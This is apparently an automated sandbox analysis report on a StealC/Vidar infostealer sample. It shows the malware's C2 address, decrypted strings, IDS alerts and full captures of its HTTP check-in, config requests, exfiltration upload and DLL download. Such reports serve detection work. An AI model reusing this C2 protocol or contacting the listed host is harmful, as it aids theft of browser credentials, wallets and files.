Click to jump to signature section
Source: http://23.88.106.134/c73eed764cc59dcb.php.0//EN | Avira URL Cloud: Label: malware |
Source: http://23.88.106.134/84bad7132df89fd7/sqlite3.dll | Avira URL Cloud: Label: malware |
Source: http://23.88.106.134 | Avira URL Cloud: Label: malware |
Source: http://23.88.106.134/c73eed764cc59dcb.php | Avira URL Cloud: Label: malware |
Source: http://23.88.106.134/c73eed764cc59dcb.phpxKr | Avira URL Cloud: Label: malware |
Source: http://23.88.106.134/c73eed764cc59dcb.phpininit.exe | Avira URL Cloud: Label: malware |
Source: 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://23.88.106.134/c73eed764cc59dcb.php"} |
Source: 1.2.RegAsm.exe.400000.0.unpack | Malware Configuration Extractor: Vidar {"C2 url": "http://23.88.106.134/c73eed764cc59dcb.php"} |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: CtIvEWInDoW |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: AgEBOxw |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: ijklmnopqrs |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: /#%33@@@ |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: abcdefghijklmnopqrs |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: @@@@<@@@ |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: abcdefghijklmnopqrs |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/| |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: %s\%V/yVs |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: %s\*. |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: }567y9n/S |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: ntTekeny |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: ging |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: PassMord0 |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: J@@@`z`@J@@@J@@@ |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: OPQRSTUVWXY |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: 456753+/---- ' |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: '--- ' |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: HeapFree |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: GetLocaleInfoA |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: ntProcessId |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: HHxf0UR{bYAy |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: wininet.dll |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: shlwapi.dll |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: shell32.dll |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: .dll |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: column_text |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: 5336 |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: login: |
Source: 1.2.RegAsm.exe.400000.0.raw.unpack | String decryptor: islr7$B |
Source: w7kdnBzGat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: | Binary string: C:\p2facz8e\output.pdb& source: w7kdnBzGat.exe |
Source: | Binary string: C:\p2facz8e\output.pdb source: w7kdnBzGat.exe |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050E877 FindFirstFileExW, | 0_2_0050E877 |
Source: C:\Users\user\Desktop\w7kdnBzGat.exe | Code function: 0_2_0050EC61 FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 0_2_0050EC61 |
Source: Traffic | Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49704 -> 23.88.106.134:80 |
Source: Traffic | Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49704 -> 23.88.106.134:80 |
Source: Traffic | Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49704 -> 23.88.106.134:80 |
Source: Malware configuration extractor | URLs: http://23.88.106.134/c73eed764cc59dcb.php |
Source: Malware configuration extractor | URLs: http://23.88.106.134/c73eed764cc59dcb.php |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 23.88.106.134Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 45 35 43 37 30 39 44 33 31 32 32 30 34 30 34 30 39 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 67 6f 79 64 61 31 34 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"5BE5C709D3122040409402------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"goyda1488------HDGCFHIDAKECFHIEBFCG-- |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDGHost: 23.88.106.134Content-Length: 472Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 2d 2d 0d 0a Data Ascii: ------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="message"browsers------BFBGDGIDBAAEBFHJKJDG-- |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 23.88.106.134Content-Length: 471Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="message"plugins------DAECGCGHCGHCAKECBKJK-- |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 23.88.106.134Content-Length: 7275Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /84bad7132df89fd7/sqlite3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 23.88.106.134Content-Length: 471Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 2d 2d 0d 0a Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="message"wallets------JDGIECGIEBKJJJJKEGHJ-- |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGHHost: 23.88.106.134Content-Length: 469Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 2d 2d 0d 0a Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="message"files------AFHIEBKKFHIEGCAKECGH-- |
Source: global traffic | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKFHost: 23.88.106.134Content-Length: 464Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 2d 2d 0d 0a Data Ascii: ------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="message"------JJKFBAKFBGDHIEBGDAKF-- |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | TCP traffic detected without corresponding DNS query: 23.88.106.134 |
Source: unknown | HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 23.88.106.134Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 45 35 43 37 30 39 44 33 31 32 32 30 34 30 34 30 39 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 67 6f 79 64 61 31 34 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"5BE5C709D3122040409402------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"goyda1488------HDGCFHIDAKECFHIEBFCG-- |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:00 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 May 2024 12:53:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 276Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 